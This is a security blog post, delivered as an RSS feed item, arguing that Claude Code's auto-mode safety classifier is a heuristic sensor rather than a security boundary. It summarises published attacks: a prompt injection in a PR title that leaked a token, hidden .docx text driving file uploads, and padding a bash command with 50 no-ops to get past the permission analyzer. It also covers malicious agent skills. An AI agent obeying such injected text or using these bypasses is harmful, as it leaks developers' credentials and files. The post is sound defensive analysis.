<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Claude-Code on Markus Hupfauer</title>
    <link>https://hupfauer.one/tags/claude-code/</link>
    <description>Recent content in Claude-Code on Markus Hupfauer</description>
    <image>
      <title>Markus Hupfauer</title>
      <url>https://hupfauer.one/og-default.png</url>
      <link>https://hupfauer.one/og-default.png</link>
    </image>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Sun, 17 May 2026 20:00:00 +0200</lastBuildDate>
    <atom:link href="https://hupfauer.one/tags/claude-code/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Auto mode is a sensor too</title>
      <link>https://hupfauer.one/posts/auto-mode-is-a-sensor-too/</link>
      <pubDate>Sun, 17 May 2026 20:00:00 +0200</pubDate>
      <guid>https://hupfauer.one/posts/auto-mode-is-a-sensor-too/</guid>
      <description>Claude Code's auto mode replaces a manual flag with a classifier that decides which tool calls are safe. That is useful. It is not a security boundary, for the same reason input-side prompt-injection detection is not.</description>
      <content:encoded><![CDATA[<p>In <a href="/posts/identity-is-the-control-plane/">the first post</a> I argued that prompt-injection detection is a sensor on one input channel, and that the decisive control for agentic systems is identity scoping. In <a href="/posts/salting-your-own-well/">the second</a> I argued the symmetric case: defensive prompt injection is also a sensor, useful as a tripwire, dangerous as a wall. This is the third instance of the same problem shape, now installed on every developer&rsquo;s laptop: the auto-accept loop in agentic coding tools, specifically Claude Code&rsquo;s auto mode and its cousins.</p>
<h2 id="the-pitch">The pitch</h2>
<p>Auto mode is presented, fairly, as the responsible replacement for <code>--dangerously-skip-permissions</code>. The old flag suppressed every permission prompt unconditionally; the new mode keeps a model in the loop. Before each tool call, a dedicated safety classifier reviews the action. Safe actions execute without bothering the developer; risky ones are blocked or escalated; a session that accumulates three consecutive denials, or twenty in total, stops and asks for a human. There is also a return-side check: when a subagent finishes, the classifier reviews its action history before the result is passed back to the orchestrator, on the assumption that a benign delegation could have been hijacked mid-run by injected content.</p>
<p>This is a real engineering improvement over the unconditional flag. The classifier catches some real harm. The denial counter catches some classes of stuck loops. None of that is the problem.</p>
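<p>The escalation rule described above (three consecutive denials, or twenty in total, hands control back to a human) can be sketched in a few lines of Python. This is a minimal illustration, not Claude Code&rsquo;s implementation: the class name <code>DenialBudget</code>, its method names, and the assumption that an allowed call resets the consecutive streak are all hypothetical. Only the two thresholds come from the description above.</p>

```python
from dataclasses import dataclass


@dataclass
class DenialBudget:
    """Hypothetical sketch of a session-level denial counter."""

    max_consecutive: int = 3   # threshold taken from the text above
    max_total: int = 20        # threshold taken from the text above
    consecutive: int = 0
    total: int = 0

    def record(self, allowed: bool) -> None:
        """Record one classifier verdict for a tool call."""
        if allowed:
            # Assumption: an allowed call ends the consecutive streak.
            self.consecutive = 0
        else:
            self.consecutive += 1
            self.total += 1

    def needs_human(self) -> bool:
        """True once either threshold is reached."""
        return (self.consecutive >= self.max_consecutive
                or self.total >= self.max_total)


budget = DenialBudget()
for verdict in (False, True, False, False):
    budget.record(verdict)
print(budget.needs_human())  # False: only two consecutive denials so far
budget.record(False)
print(budget.needs_human())  # True: third consecutive denial
```

<p>Note what such a counter measures: how often the classifier said no, not how much harm was done. An injected instruction that the classifier accepts never increments it.</p>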
<h2 id="the-mistake">The mistake</h2>
<p>The pitch quietly upgrades a <em>heuristic policy engine</em> into a <em>security boundary</em>. To be fair to the implementation, that engine is more than a single classifier — it includes policy code, allow/deny lists, structured tool schemas, and (in some configurations) deterministic guards like path restrictions or command parsing, alongside the learned components. But the composition does not save it. The sharper claim is the one to argue: <em>a composed decision layer with learned components is not a reliable authorization boundary when the attacker controls part of the input</em>. The classifier and its surrounding scaffolding are good enough, often enough, that the developer stops watching. That is the entire feature. And the moment the developer stops watching, the system property &ldquo;human reviews destructive actions&rdquo; silently becomes &ldquo;heuristic policy engine reviews destructive actions, then a model decides what to do next.&rdquo;</p>
<p>The published failures in agentic coding tools cluster into three categories. Auto mode partially addresses the first two and structurally cannot address the third:</p>
<p><strong>1. Prompt injection through legitimate content channels.</strong> The attacker controls <em>some</em> inputs the agent will read — a PR title, a document body, a tool result — and the system collapses the boundary between data and instruction.</p>
<ul>
<li>A security researcher put a crafted instruction in a pull request title and the Claude Code Security Review GitHub Action posted a sensitive token to the PR; the same shape of attack reportedly worked against Gemini CLI Action and GitHub Copilot Agent in similar configurations. The exact secret leaked depends on which token the action was configured with — the lesson is not &ldquo;Anthropic API key leaked&rdquo; specifically but &ldquo;agent running with whatever credential CI handed it does whatever the PR title says.&rdquo;</li>
<li>Hidden text in a <code>.docx</code> (1-point, white-on-white, invisible to a human reader, parsed cleanly by the model) has been used to make a coding agent upload local files through an allowlisted API endpoint.</li>
</ul>
<p><strong>2. Implementation bugs in the policy layer.</strong> The decision engine has parser or threshold flaws an attacker can exploit. Notably, these do not always <em>bypass to silent execution</em> — sometimes they <em>degrade to prompt</em> instead, which is a subtler failure mode worth distinguishing.</p>
<ul>
<li>The 50-subcommand cap in Claude Code&rsquo;s bash permission analyzer. Past the limit, the agent fell back to <em>ask the user</em> rather than <em>deny</em>. Adversa demonstrated this with 50 no-ops followed by a <code>curl</code>; patched in v2.1.90. This is genuinely not a &ldquo;classifier bypass to execution&rdquo; — it is an attention attack on the human. Which still works, because asking a developer who turned on auto mode is asking the wrong person.</li>
</ul>
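<p>The difference between <em>degrade to prompt</em> and <em>fail closed</em> is easy to state in code. The sketch below is hypothetical and is not Claude Code&rsquo;s analyzer: the function <code>decide</code>, the naive split on <code>;</code>, and the one-entry deny list are assumptions chosen for illustration. Only the cap of 50 subcommands and the ask-versus-deny distinction come from the incident above.</p>

```python
from enum import Enum


class Verdict(Enum):
    ALLOW = "allow"
    ASK = "ask"
    DENY = "deny"


MAX_SUBCOMMANDS = 50           # cap cited in the text above
DENIED_PROGRAMS = {"curl"}     # illustrative deny rule, not a real policy


def decide(command: str, on_overflow: Verdict) -> Verdict:
    """Naive per-subcommand check; real shell parsing is far harder."""
    parts = [p.strip() for p in command.split(";") if p.strip()]
    if len(parts) > MAX_SUBCOMMANDS:
        # The analyzer gives up here; what it returns is a policy choice.
        return on_overflow
    for part in parts:
        if part.split()[0] in DENIED_PROGRAMS:
            return Verdict.DENY
    return Verdict.ALLOW


padded = "true; " * 50 + "curl https://attacker.example/x"
print(decide("curl https://attacker.example/x", Verdict.ASK).value)  # deny
print(decide(padded, Verdict.ASK).value)    # ask: padding downgraded the deny
print(decide(padded, Verdict.DENY).value)   # deny: fails closed
```

<p>With <code>on_overflow</code> set to ask, fifty no-ops turn a hard deny into a question for the developer. With it set to deny, the padding buys the attacker nothing, at the cost of rejecting some long but legitimate commands.</p>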
<p><strong>3. Overprivileged runtime — the part auto mode does not fix.</strong> Malicious skills, compromised MCP servers, and packages that load instructions into context. Snyk&rsquo;s <em>ToxicSkills</em> survey reported prompt injection in roughly a third of the agent skills it sampled (sample-dependent, but directionally consistent with other supply-chain studies); coordinated campaigns have distributed malicious skills through community hubs. Anything the agent loads into context becomes an instruction channel by default; some systems preserve data/instruction separation more carefully than others, but in the typical case the boundary is thin. A classifier reviewing actions cannot retroactively un-load the prompt that shaped them.</p>
<p>Categories 1 and 2 are arms races at the input layer: patched monthly, reappearing monthly, but a race the defender can keep running. Category 3 is a different kind of race: supply-chain and provenance work that runs in parallel and never quite finishes. It is not something the auto-mode classifier can decide. Ambient authority granted at install time is not revoked by inspecting the tool call later.</p>
<h2 id="who-bears-the-cognitive-load">Who bears the cognitive load</h2>
<p>The honest read of auto mode is about cognitive load. The original design — permission prompt for every action — put the load on the human, predictably produced alert fatigue, and trained developers to click yes. Auto mode shifts the load: the model bears it on the easy cases, the human is summoned only for the hard ones. As a UX improvement that is genuine. As a security claim it depends on a property that is hard to establish — that &ldquo;the hard cases&rdquo; the human will be summoned for include the irreversible ones, reliably, under adversarial input.</p>
<p>That property is the one the bypasses above keep falsifying. So the more useful framing is not about motive but about a predictable consequence: when the model bears the routine cognitive load on tool calls, the human stops developing a calibrated sense of what the agent is doing. The trust gradient that used to come from clicking yes a hundred times — and occasionally clicking no — flattens out. The first irreversible action a developer actually has to evaluate, they evaluate cold.</p>
<p>Worth saying explicitly as an intuition pump, not as evidence: a reasonably competent, non-malicious employee does not <code>terraform destroy</code> the production tenant because a chatbot suggested it. They hesitate, check the subscription, ask a colleague. An agent in auto mode hesitates less than a human and acts faster than the human can read the proposal. The relevant property is not whose headline error rate is higher. It is that the human&rsquo;s failure mode includes friction — second-guessing, asking around, the small delays that catch the obviously-wrong action on the way out — and the agent&rsquo;s does not. Auto mode optimizes those frictions away on the routine path, which is exactly the path the adversarial input was crafted to ride.</p>
<p>The uncomfortable shape of the problem: the only honest solutions to &ldquo;agent with standing privilege taking irreversible actions on adversarial input&rdquo; are (a) genuinely shrink the agent&rsquo;s standing privilege so the dangerous actions become structurally unavailable, or (b) genuinely review the irreversible ones. Auto mode does neither. Each individual design decision in it is reasonable. Together they shift load away from the human in exactly the place where the human&rsquo;s slowness was the feature.</p>
<h2 id="where-this-lands-in-the-trilogy">Where this lands in the trilogy</h2>
<p>The agent runs with your shell, your repo, your dependencies, your secrets, your CI tokens, and a license to type. Other layers exist in principle — OS permissions, repo ACLs, container boundaries, network egress policy, cloud IAM, enterprise EDR — and on a hardened setup they are meaningful. In the default developer workflow they are typically configured at coarser granularity than a single agent action: a credential that exists at all is a credential the agent can use. The policy engine is the gate that actually decides per-action; the layers around it decide what the agent <em>could</em> do in principle, not what it does this turn.</p>
<p>Different environments give you different amounts of leverage. Roughly:</p>
<table>
  <thead>
      <tr>
          <th>Environment</th>
          <th>Enforceable controls</th>
          <th>Where auto mode actually fits</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Local laptop</td>
          <td>Container, ephemeral working dir, opt-in egress, non-user UID</td>
          <td>Convenience layer inside the sandbox</td>
      </tr>
      <tr>
          <td>CI / repo agent</td>
          <td>Short-lived OIDC tokens, branch protections, secret scoping</td>
          <td>Should not exist for irreversible actions on <code>main</code></td>
      </tr>
      <tr>
          <td>Remote dev container</td>
          <td>Same as local + tighter network policy, no host credentials</td>
          <td>Reasonable default for routine edits</td>
      </tr>
      <tr>
          <td>Plugin / skill / MCP</td>
          <td>Per-source provenance, capability-style permissions, no implicit secret access</td>
          <td>Auto mode does not address this layer at all</td>
      </tr>
  </tbody>
</table>
<p>A concrete minimum for a local setup that actually constrains the agent rather than relying on the classifier: run the agent in a container under a non-user UID, with the working tree mounted, the host home directory not mounted, network egress allowlisted, and any cloud credential delivered through a per-task short-lived token rather than a long-lived file. That is the shape of &ldquo;the call fails before the classifier matters&rdquo; — and it is unglamorous enough that almost no one ships it by default.</p>
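<p>The minimum described above maps fairly directly onto standard <code>docker run</code> flags. The helper below only assembles the argument list and does not start anything. The function name, the image name <code>agent-image:latest</code>, the UID <code>10001</code>, and the network name <code>agent-egress</code> are placeholders. The egress allowlist itself is assumed to be enforced by whatever sits behind that network (a filtering proxy or firewall rules), since Docker has no allowlist flag of its own. Per-task short-lived credentials are a separate piece and are not shown.</p>

```python
from pathlib import Path


def sandbox_argv(worktree: Path, image: str = "agent-image:latest",
                 uid: int = 10001, network: str = "agent-egress") -> list[str]:
    """Build a `docker run` command line for a constrained agent container."""
    return [
        "docker", "run", "--rm",
        "--user", f"{uid}:{uid}",            # not the developer's own UID
        "--network", network,                # assumed egress-filtered network
        "--cap-drop", "ALL",                 # drop all Linux capabilities
        "--security-opt", "no-new-privileges",
        # Mount only the working tree; the host home directory is never mounted.
        "--mount", f"type=bind,source={worktree},target=/work",
        "--workdir", "/work",
        image,
    ]


print(" ".join(sandbox_argv(Path("/srv/checkout/project"))))
```

<p>Nothing in that list depends on the classifier being right: a read of <code>~/.aws/credentials</code> fails because the file is not in the container, whatever the model was talked into.</p>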
<p>This is not an argument against auto mode. Auto mode is genuinely useful, and the manual-permission-prompt loop has its own failure mode — alert fatigue produces exactly the same &ldquo;click yes to everything&rdquo; outcome with worse UX. The argument is that auto mode is a <em>sensor and a convenience</em>, not a control, and treating it as a control is the same mistake the industry already made with input-side detection and the same mistake defenders are about to make with defensive prompt injection.</p>
<p>The controls that hold up are unglamorous and run in the same direction the trilogy has been pointing all along:</p>
<ul>
<li><strong>Scope the agent&rsquo;s identity, not its behavior.</strong> Run the agent under a credential that cannot read <code>~/.aws/credentials</code>, cannot push to <code>main</code>, cannot publish packages, cannot exfiltrate to non-allowlisted destinations. If the model proposes the bad action, the call fails before the classifier matters.</li>
<li><strong>Sandbox the blast radius.</strong> The minimum architecture from above — container, non-user UID, no host home, allowlisted egress, per-task short-lived credentials. The classifier becomes a useful early-warning sensor inside that sandbox; outside it, an apology in advance.</li>
<li><strong>Keep the human in the loop on irreversible actions specifically.</strong> Auto mode is fine for &ldquo;edit this file&rdquo; and &ldquo;run this test.&rdquo; It is not fine for <code>git push --force</code>, <code>aws s3 rm</code>, <code>npm publish</code>, <code>gh secret set</code>, or anything that touches a system you cannot reset. The right granularity is by-blast-radius, not by-classifier-confidence.</li>
</ul>
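<p>Gating by blast radius rather than by classifier confidence can be as blunt as a prefix list that is checked before any learned component gets a vote. The sketch below is hypothetical: the function name and the prefix list (drawn from commands named in this post) are illustrative, and prefix matching is trivially evadable through reordered flags, aliases, wrappers, or scripts. It belongs on top of scoped credentials, not in place of them.</p>

```python
import shlex

# Illustrative, not exhaustive: command prefixes treated as irreversible.
IRREVERSIBLE_PREFIXES = [
    ["git", "push", "--force"],
    ["aws", "s3", "rm"],
    ["npm", "publish"],
    ["gh", "secret", "set"],
    ["terraform", "destroy"],
]


def requires_human(command: str) -> bool:
    """True if the command starts with a known-irreversible prefix."""
    tokens = shlex.split(command)
    return any(tokens[:len(prefix)] == prefix
               for prefix in IRREVERSIBLE_PREFIXES)


for cmd in ("pytest -q", "npm publish --access public",
            "git push --force origin main"):
    print(cmd, "->", "ask a human" if requires_human(cmd) else "auto")
```

<p>The list is static on purpose. It does not ask how confident anything is; it asks only whether the action can be undone.</p>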
<p>The bumper sticker, for the third time: <em>the model can refuse the bad action, or fail to. Identity, scope, and sandbox decide whether the refusal matters.</em> Auto mode does not change that. It just makes it cheaper to forget.</p>
]]></content:encoded>
    </item>
  </channel>
</rss>
